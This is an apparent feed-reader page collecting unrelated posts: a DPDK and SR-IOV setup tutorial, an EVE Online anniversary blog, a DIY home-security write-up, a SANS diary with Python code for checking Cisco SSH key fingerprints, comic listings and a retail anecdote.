Apart from DPDK itself, the DPDK site hosts several other open-source projects. One is the DPDK Test Suite (DTS), which is a Python-based framework for DPDK. It has more than 100 test modules for various features, including the most advanced and most recent features. It runs with IXIA and Scapy traffic generators. It includes both functional and benchmarking tests, and it's very easy to configure and run, as you need to set up only three or four configuration files. You also can set the DPDK version with which you want to run it. DTS development is handled over a dedicated mailing list, and it currently has support for Intel NICs and Mellanox NICs.

DPDK is released every three months. This release cadence is designed to allow DPDK to keep evolving at a rapid pace while giving enough opportunity to review, discuss and improve the contributions. There are usually 3–5 release candidates (RCs) before the final release. For the 17.08 release, there were 1,023 patches from 125 authors, including patches from Intel, Cavium, 6WIND, NXP and others. The release numbers follow the Ubuntu versions convention. A Long Term Stable (LTS) release is maintained for two years. Plans for future LTS releases currently are being discussed in the DPDK community. The plan is to make every .11 release in an even-numbered year (16.11, 18.11 and so forth) an LTS release and to maintain it for two years.

Recent Features and New Ideas

Several interesting features were added last year. One of the most fascinating capabilities (added in DPDK 17.05, with new features enabled in 17.08 and 17.11) is "Dynamic Device Personalization" (DDP) for the Intel I40E driver (10Gb/25Gb/40Gb). This feature allows applying a per-device profile to the I40E firmware dynamically. You can load a profile by running a testpmd CLI command (ddp add), and you can remove it with ddp del. You also can apply or remove profiles when traffic is flowing, with a small number of packets dropped while the profile is being handled. These profiles are created by Intel and not by customers, as I40E firmware programming requires deep knowledge of the I40E device internals.

Other features to mention include Bruce Richardson's build system patch, which provides a more efficient build system for DPDK with meson and ninja, a new kernel module called Kernel Control Path (KCP), port representors and more.

DPDK and Networking Projects

DPDK is used in various important networking projects. The list is quite long, but I want to mention a few of them briefly:

  • Open vSwitch (OvS): the OvS project implements a virtual network switch. It was transitioned to the Linux Foundation in August 2016 and gained a lot of popularity in the industry. DPDK was first integrated into OvS 2.2 in 2015. Later, in OvS 2.4, support for vHost user, which is a virtual device, was added. Support for advanced features like multi-queues and NUMA awareness was added in subsequent releases.
  • Contrail vRouter: Contrail Systems was a startup that developed SDN controllers. Juniper Networks acquired it in 2012, and Juniper Networks released the Contrail vRouter later as an open-source project. It uses DPDK to achieve better network performance.
  • pktgen-dpdk: an open-source traffic generator based on DPDK (hosted on the DPDK site).
  • TREX: a stateful and stateless open-source traffic generator based on DPDK.
  • Vector Packet Processing (VPP): an FD.io project.

Getting Started with DPDK

For those who are newcomers to DPDK, both users and developers, there is excellent documentation hosted on the DPDK site. It's recommended that you actually try running several of the sample applications (following the "Sample Applications User Guides"), starting with the "Hello World" application. It's also a good idea to follow the dpdk-users mailing list on a regular basis. For those who are interested in development, the Programmer's Guide is a good source of information about the architecture and development environment, and developers should follow the dpdk-dev mailing list as well.

DPDK and SR-IOV Example

I want to conclude this article with a very basic example (based on SR-IOV) of how to create a DPDK VF and how to attach it to a VM with qemu. I also show how to create a non-DPDK VF ("kernel VF"), attach it to a VM, run a DPDK app on that VF and communicate with it from the host.

As a preparation step, you need to enable IOMMU and virtualization on the host. To support this, add intel_iommu=on iommu=pt as kernel parameters to the kernel command line (in grub.cfg), and also enable virtualization and VT-d in the BIOS (VT-d stands for "Intel Virtualization Technology for Directed I/O"). You'll use the Intel I40E network interface card for this example. The I40E device driver supports up to 128 VFs per device, divided equally across ports, so if you have a quad-port I40E NIC, you can create up to 32 VFs on each port.

For this example, I also show a simple usage of the testpmd CLI, as mentioned earlier. This example is based on DPDK-17.08, the most recent release of DPDK at the time of this writing. In this example, you'll use Single Root I/O Virtualization (SR-IOV), which is an extension of the PCI Express (PCIe) specification and allows sharing a single physical PCI Express resource across several virtual environments. This technology is very popular in data-center/cloud environments, and many network adapters support this feature, and likewise, their drivers support this feature. I should note that SR-IOV is not limited to network devices, but is available for other PCI devices as well, such as graphics cards.

DPDK VF

You create DPDK VFs by writing the number of requested VFs into a DPDK sysfs entry called max_vfs. Say that eth8 is the PF on top of which you want to create a VF and its PCI address is 0000:07:00.0. (You can fetch the PCI address with ethtool -i eth8 | grep bus-info.) The following is the sequence you run on the host in order to create a VF and launch a VM. First, bind the PF to DPDK with usertools/dpdk-devbind.py, for example:


modprobe uio
insmod /build/kmod/igb_uio.ko
./usertools/dpdk-devbind.py -b igb_uio 0000:07:00.0

Then, create two DPDK VFs with:


echo 2 > /sys/bus/pci/devices/0000:07:00.0/max_vfs

You can verify that the two VFs were created by this operation by checking whether two new entries were added when running: lspci | grep "Virtual Function", or by verifying that you have now two new symlinks under /sys/bus/pci/devices/0000:07:00.0/ for the two newly created VFs: virtfn0 and virtfn1.

Next, launch the VMs via qemu using PCI Passthrough, for example:


qemu-system-x86_64 -enable-kvm -cpu host \
    -drive file=Ubuntu_1604.qcow2,index=0,media=disk,format=qcow2 \
    -smp 5 -m 2048 -vga qxl \
    -vnc :1 \
    -device pci-assign,host=0000:07:02.0 \
    -net nic,macaddr=00:00:00:99:99:01 \
    -net tap,script=/etc/qemu-ifup

Note: qemu-ifup is a shell script that's invoked when the VM is launched, usually for setting up networking.

Next, you can start a VNC client (such as RealVNC client) to access the VM, and from there, you can verify that the VF was indeed assigned to it, with lspci -n. You should see a single device, which has "8086 154c" as the vendor ID/device ID combination; "8086 154c" is the virtual function PCI ID of the I40E NIC. You can launch a DPDK application in the guest on top of that VF.

Kernel VF

To conclude this example, let's create a kernel VF on the host and run a DPDK on top of it in the VM, and then let's look at a simple interaction with the host PF.

First, create two kernel VFs with:


echo 2 > /sys/bus/pci/devices/0000:07:00.0/sriov_numvfs

Here again you can verify that these two VFs were created by running lspci | grep "Virtual Function".

Next, run this sequence:


echo "8086 154c" > /sys/bus/pci/drivers/pci-stub/new_id
echo 07:02.0 > /sys/bus/pci/devices/$VF_PCI_0/driver/unbind
echo 07:02.0 > /sys/bus/pci/drivers/pci-stub/bind

Then launch the VM the same way as before, with the same qemu-system-x86_64 command mentioned earlier. Again, in the guest, you should be able to see the I40E VF with lspci -n. On the host, doing ip link show will show the two VFs of eth8: vf 0 and vf 1. You can set the MAC addresses of a VF from the host with ip link set—for example:


ip link set eth8 vf 0 mac 00:11:22:33:44:55

Then, when you run a DPDK application like testpmd in the guest, and run, for example, show port info 0 from the testpmd CLI, you'll see that indeed the MAC address that you set in the host is reflected for that VF in DPDK.

Summary

This article provides a high-level overview of the DPDK project, which is growing dynamically and gaining popularity in the industry. The near future likely will bring support for more network interfaces from different vendors, as well as new features.

06 May 14:17

Fanfest & Birthdays! - New Eden Turns Teenager!

by CCP Falcon

Another year has come and gone for New Eden, with today marking the thirteenth anniversary of the release of EVE Online.

For over a decade now, time and time again our community has completely destroyed the assumptions and expectations of what a massively multiplayer game should be. Year on year the pilots who inhabit this incredible universe that we’ve all created together have continued to tread new ground, creating incredible player-driven narratives, new challenges for CCP as developers, and some of the largest conflicts, wars and propaganda campaigns ever seen in gaming, along with amazing player-created software, spectacular EVE videos and amazing support networks such as Broadcast 4 Reps.

Before we look at Fanfest and the 13th Anniversary in a little more depth, let’s listen to a few important words from CCP Seagull, Executive Producer for EVE Online as she shares her thoughts on New Eden’s 13th year!

After watching the latest video blog from CCP Seagull and starting to put together this blog, I also took a look back and charted my own journey with EVE, surprised at what I found and the sheer amount of nostalgia that came back as I retraced that journey and remembered all the events I’ve either been part of or have witnessed as a player in EVE over the last thirteen years.

From the Great Northern War to the blockade of Mara by m0o corp, the Zombies smartbomb attack on Yulai, the Rise and fall of NVA, CFS, Stain Alliance, Ascendant Frontier, Fountain Alliance, Xetic Federation, Curse Alliance, and many more.

The collapse of Band of Brothers, the advance then retreat of Red Alliance, the rise of GoonSwarm and their eventual collapse, only to be reformed again, all of these are stories that were written by the actions and aspirations of pilots in New Eden.

The list really does go on, in no particular order, with the loss of the first titan, affectionately named “Steve”, the rise of the Interstellar Starbase Syndicate, then their execution at the hands of a coalition of angry alliances led by the Interstellar Alcohol Conglomerate when their neutrality was called into question.

The war for Providence that saw Ushra’Khan ousted from Unity Station in 9UY4-H, the Battle of Asakai, the Bloodbath of B-R5RB, and more recently the battle of M-0EE8 as the Moneybadger Coalition was formed and the collapse of Mercenary Coalition, who also recently reformed and returned to the fold.

These are all stories of political intrigue, conflict, betrayal, teamwork, loyalty and in some instances cluster wide war that have been crafted by the actions and interactions of our community, which form the very fabric of the living work of Science Fiction that is New Eden.

And so we come to 2016, with thirteen years of history behind us, and who knows how many stories yet to be told. Conflict continues to rage across New Eden, with more and more tools placed in the hands of our intrepid pilots each release to assist them with continuing to build their own empires.

From the simple miner who’s happy to spend their time seeking out and harvesting resources to fuel New Eden’s cycle of creation and destruction, to the coalition leader who commands fleets of thousands on a whim, we want to make sure we continue to expand and enhance the opportunities our pilots have to continue to create these amazing stories.

As we showed at Fanfest 2016… here’s a quick rundown of the last year in terms of features and content that have been added to New Eden:

 

Fanfest 2016

Speaking of both Fanfest and amazing stories, now that the dust has settled and we’ve all recovered from an epic Fanfest 2016, let’s take a look back at some of the highlights of what was an amazing event this year here in Reykjavik.


This year we had more player focused content than ever before at Fanfest, with presentations and roundtables from ExookiZ, Gnaeus Crassus, Steve Ronuken, Makoto Priano, Max Singularity and QuantumDelta to name but a few, who shared their experiences and stories with attendees and those watching from home via the o7 Live Stream.

 

Cosplay


Of course, presentations weren’t the only thing that our players managed to get up to during Fanfest. With the return of the Fanfest Cosplay Contest this year we saw some of the most creative cosplay yet at an EVE Event, and three lucky winners took home a considerable bounty of prizes.

A huge shout out to Sancta Bassilica, Gomby Roffo and Max Singularity who took away a bounty of prizes this year including PLEX, a GTX 970 video card, signed chronicle artwork and mentions in chronicles that will be written over the course of 2016.

Things got a little hairy in a couple of instances, with Fedos and rebellious Matari on the loose, but thankfully we were able to contain any diplomatic incidents this time around.

 

Pub Crawl

Each year when Fanfest rolls around, one of the highlights of the event is the annual pubcrawl around downtown Reykjavik. This year was no exception as our pilots rolled out in force across bars in the downtown area after starting out with beer and a Brennivín toast at Harpa.

Once again, as is traditional at Fanfest, pilots were able to raise a glass to interstellar conquest, before heading to the final destination of the night, Iðnó, to finish up the pub crawl with the best dance party this side of The Glittering Dream nightclub in Caille.


 

Amarr Championships

As well as being incredibly close to the 13th anniversary of New Eden, Fanfest 2016 played host to one of the most important events in recent backstory, the finals of the Imperial Succession trials – The Amarr Championships.

Lysus led a team of retainers for house Kor-Azor against Kelon Darklight, fronting his team for house Tash-Murkon. Fanfest saw a bloody best of five that went right down to the wire in the final match, with Kelon Darklight’s team claiming victory.

With the Amarr Championships now concluded, EVE players have yet again left their mark on the very fabric of New Eden, deciding the fate of an Empire and who will lead it for the foreseeable future, with the efforts of Kelon Darklight and his team of retainers securing the ascension of Empress Catiz I to the Golden Throne of the Amarr Empire.


 

In addition to the entertainment, pub crawl and more player focused content than ever before at Fanfest, we once again hosted the Fanfest Charity Evening, which by popular demand returned to Kolabrautin, the restaurant on the top floor of Harpa. There players and developers alike had the chance to share drinks, dinner and stories from New Eden.

Supporting the Charity Evening this year we had the traditional Fanfest Silent Auction, which contained more than fifty lots this year and raised more than $5,700 as part of the Fanfest 2016 charity drive.

When totaled up with the $10,430 that was raised by the charity evening, this gave us a grand total of more than $16,100 raised for Barnaspítali Hringsins, the Icelandic Children’s Hospital, during Fanfest 2016. We couldn’t be more proud of our players for this contribution to an incredibly worthwhile cause.

 

The Party on top of the World

I’d really love to try to explain this, but in this case “a picture is worth a thousand words” really is true.

Here’s a few from the Party on top of the World…





Thirteen years…

I remember the release of EVE, and expecting the game to last maybe a year or two. I remember thinking “an incredibly ambitious game made by a group of crazy Vikings from a country I’ve barely heard of… It looks interesting, I’ll play it while it lasts”.

Then I remember two years in thinking “I’m gonna start my own corporation, it looks like this is getting really serious…”

Eight years later and after many visits to Iceland, I boarded a plane in 2012 to come work full time for CCP after being a player, an ISD Volunteer, a CEO, a Fleet Commander, an industrialist, a miner, a PvPer and even a scammer in New Eden.

After thirteen years, EVE has gone from this:

To this:

In all that time, one thing has stayed the same. Always committed, never wavering, always hungry for more. More creation, more destruction, more conflict, more politics, more of a challenge.

Today we don’t just celebrate the thirteenth anniversary of EVE, we celebrate what makes EVE unique, intriguing and what keeps the cycle of creation and destruction flowing that forms the heart of New Eden.

That one thing is our community, who over the last thirteen years have taken EVE from strength to strength with incredible narratives of war, conflict, espionage, political drama and betrayal.

Paradoxically, in 13 years this amazing community has also raised over half a million dollars for charity, founded its own in game charities to assist gamers in need such as Broadcast 4 Reps, Care 4 Kids and The Best of Us, and has shown unbelievable support for each other both in times of need and during real world gatherings when rival pilots come together to share drinks and stories.

Granted, there have been a few ups and downs along the way and the odd bump in the road, but today EVE Online has never been in a stronger position to push forward and break new boundaries, and this is in large part due to the dedication, passion, creativity and tenacity of our community.

With citadels springing up across New Eden, we’re seeing the dawn of a new age of control over the cluster for our community, and there’s still so much more to come.

From everyone here at CCP Games, thank you all sincerely for an incredible thirteen years.

As we roll into year fourteen, and toward the 20th Anniversary of CCP, here’s to many, many more ahead.

@CCP_Falcon

EVE Universe Community Manager

24 Apr 13:02

Small Experiments in DIY Home Security

by Gerrit Coetzee

[Dann Albright] writes about some small experiments he’s done in home security.

He starts with the simplest, which is to purchase an off-the-shelf web camera and hook it up to software built to do the task. The first software he uses is the free, open source iSpy. This adds basic features like motion detection, time stamping, logging, and an interface. He also explores other commercial options.

Next he delves a bit deeper. He starts by making a simple motion detector. When the Arduino detects motion using a PIR sensor, it gets a computer to text an alert. After that the tutorial begins to veer a little, and he adds his WiFi light bulbs to the mix. Now he can send an email and change the color of the lights.

We suppose that, from a security standpoint, it would really freak a burglar out if all the lights turned red when they walked into a room. Either way, there’s definitely a fun weekend project in playing around with all these systems.


10 Feb 17:52

02/10/16 PHD comic: 'In your dreams'

Piled Higher & Deeper by Jorge Cham
www.phdcomics.com
title: "In your dreams" - originally published 2/10/2016


05 Sep 15:15

Linux Plumbers Conference 2016 call for organizers

by corbet
It's time to figure out who will be organizing the Linux Plumbers Conference in 2016, which is planned to be held in Santa Fe, New Mexico, at the beginning of November, alongside the Kernel Summit. Interested organizers should put together a bid and submit it to the Linux Foundation's Technical Advisory Board by October 5; see this page for details on how the process works. "This is your chance to put your stamp on one of our community's most important gatherings in a year when we will be celebrating 25 years of the Linux kernel."
03 Apr 15:39

SSH Fingerprints Are Important, (Fri, Apr 3rd)

Some years ago, I was preparing Cisco certification exams. I connected via SSH to a new Cisco router, and was presented with this familiar dialog:


This made me think: before proceeding, I wanted to obtain the fingerprint out-of-band, via a trusted channel, so that I could verify it. So I took a console cable, logged on via the serial console, and then I started to wonder what IOS command to type? A couple of hours spent with Google later, I was no closer to a solution. I could not find an IOS command to display the SSH fingerprint.

I found forum posts advising to connect via a crossover cable and write the presented SSH fingerprint down, but that's not what I wanted. I had to work out my own solution.

There's an IOS command to dump your public key: show crypto key mypubkey rsa

If you take the modulus and exponent of your public key, arrange them in another format (ssh-rsa) and calculate the MD5 hash, then you obtain the fingerprint.


Of course, I could not resist writing a Python program for that :-)

You can find it here.

If you know a Cisco IOS command to obtain the SSH fingerprint key directly, then please post a comment.

Update: on Cisco IOS versions released after I researched this, the show ip ssh
Authentication retries: 3
Minimum expected Diffie Hellman key size : 1024 bits
IOS Keys in SECSH format(ssh-rsa, base64 encoded):
ssh-rsa AAAAB3NzaC1yc2EAA.....

If you decode the base64 encoded ssh-rsa data, and calculate the MD5, you obtain the fingerprint.
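
The two calculations described above (modulus and exponent arranged as ssh-rsa, and base64-decoding a SECSH line), as an added Python example that is not the program the diary links to. The modulus and exponent are assumed to have been read off the router already; the sample values are constructed, not a real key.

```python
import base64
import hashlib
import struct

def ssh_string(data: bytes) -> bytes:
    # RFC 4251 "string": 4-byte big-endian length, then the raw bytes.
    return struct.pack(">I", len(data)) + data

def ssh_mpint(value: int) -> bytes:
    # RFC 4251 "mpint": big-endian two's complement. A positive number whose
    # top bit is set needs a leading 0x00, which RSA moduli normally do.
    if value < 0:
        raise ValueError("RSA parameters are non-negative")
    raw = value.to_bytes((value.bit_length() + 7) // 8, "big")
    if raw and raw[0] & 0x80:
        raw = b"\x00" + raw
    return ssh_string(raw)

def rsa_blob(modulus: int, exponent: int) -> bytes:
    # RFC 4253 ssh-rsa public key blob: "ssh-rsa", then e, then n.
    return ssh_string(b"ssh-rsa") + ssh_mpint(exponent) + ssh_mpint(modulus)

def md5_fingerprint(blob: bytes) -> str:
    # Colon-separated hex, the form classic SSH clients display.
    digest = hashlib.md5(blob).hexdigest()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))

def fingerprint_from_secsh(line: str) -> str:
    # Accepts "ssh-rsa <base64> [comment]" as printed in SECSH format.
    fields = line.split()
    if len(fields) < 2 or fields[0] != "ssh-rsa":
        raise ValueError("expected an ssh-rsa key line")
    blob = base64.b64decode(fields[1], validate=True)
    if not blob.startswith(ssh_string(b"ssh-rsa")):
        raise ValueError("blob does not carry an ssh-rsa key")
    return md5_fingerprint(blob)

# Constructed sample values (not a real key): a 1024-bit number with the top
# bit set stands in for the modulus read from the router over the console.
SAMPLE_N = int("c1" + "5a" * 127, 16)
SAMPLE_E = 65537

if __name__ == "__main__":
    blob = rsa_blob(SAMPLE_N, SAMPLE_E)
    line = "ssh-rsa " + base64.b64encode(blob).decode()
    print("from modulus/exponent:", md5_fingerprint(blob))
    print("from SECSH line:      ", fingerprint_from_secsh(line))
```

Current OpenSSH clients show SHA256 fingerprints by default; `ssh -o FingerprintHash=md5` makes the client display the MD5 form so it can be compared with the value computed out-of-band.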

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
13 Sep 16:25

A Little Bird Told Her Wrong

Retail | FL, USA

(I work at a horse supply/tack store. We don’t sell any sort of animal.)

Me: “Hello. How can I help you?”

Customer: “Hi. Do you sell pigeons?”

Me: “What’s a pigeon?”

Customer: “You don’t know what a pigeon is?”

Me: “Well, like the bird, pigeon?”

Customer: “Yes.”

Me: “No, we don’t sell birds.”

Customer: “What type of store is this that you don’t sell birds?”

Me: “Uhm, a horse supply store.”

Customer: “Oh, the yellow pages didn’t say anything about that!”

11 Jun 09:32

06/11/14 PHD comic: 'The Turing Test'

Piled Higher & Deeper by Jorge Cham
www.phdcomics.com
title: "The Turing Test" - originally published 6/11/2014


23 Apr 10:19

04/21/14 PHD comic: 'An Honest Methods Section'

Piled Higher & Deeper by Jorge Cham
www.phdcomics.com
title: "An Honest Methods Section" - originally published 4/21/2014
